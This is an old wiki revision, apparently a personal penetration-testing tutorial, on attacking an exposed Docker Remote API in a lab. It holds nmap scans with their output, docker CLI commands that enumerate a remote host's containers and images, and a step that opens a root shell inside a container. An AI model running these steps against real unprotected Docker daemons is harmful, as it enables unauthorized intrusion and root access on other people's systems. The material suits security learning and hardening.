This is an old revision of the document!
Docker - Attack Docker exposed API
If you have enabled Docker Remote API, per Enable Docker Remote API, you may be vulnerable to attacks.
Information Gathering & Enumeration
Do a port scan
sudo nmap -sS -T5 192.168.1.118 -p-Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-11 12:37 CEST Nmap scan report for 192.168.1.118 Host is up (0.00076s latency). Not shown: 65498 closed ports, 35 filtered ports PORT STATE SERVICE 22/tcp open ssh 1234/tcp open docker MAC Address: 0C:01:67:8A:63:F2 (Oracle VirtualBox virtual NIC)
I had to scan more ports that the default top 1000 because the docker API port is not included :( Ok then, what about service detection?
nmap -sTV -p 1234 192.168.1.118 Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-11 12:43 CEST Nmap scan report for 192.168.1.118 Host is up (0.00038s latency). PORT STATE SERVICE VERSION 1234/tcp open 18.06.0-ce Docker Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 75.65 seconds
This confirm that we are dealing with Docker.
nmap also discovered the exact version of Docker. If we want to confirm it manually we can issue a GET request to the endpoint located at: http:<IP>:1234/version. <code bash> curl -s http://192.168.1.118:1234/version | python -m json.tool </code>
NOTE: Claudio Criscione wrote a nmap script to do this (His GitHub page).
—- ===== Test the exposed API using the docker CLI ===== <code bash> docker -H 192.168.1.118:1234 info </code> —- ==== Gather Information ==== Are there some containers running? <code bash> docker -H 192.168.1.118:1234 ps </code> —- Are there some stopped containers? <code bash> docker -H 192.168.1.118:1234 ps -a What are the images pulled on the host machine? <code bash> docker -H 192.168.1.118:1234 images </code> —- ===== Accessing the container ===== Spawn a bash shell: <code bash> docker -H 192.168.1.118:1234 exec -it <container name> /bin/bash </code> Check ownership: <code bash> whoami && id root uid=0(root) gid=0(root) groups=0(root) </code>
NOTE: Already root!!!
The default user inside a container is root.
Once inside a container you can start digging for some useful information.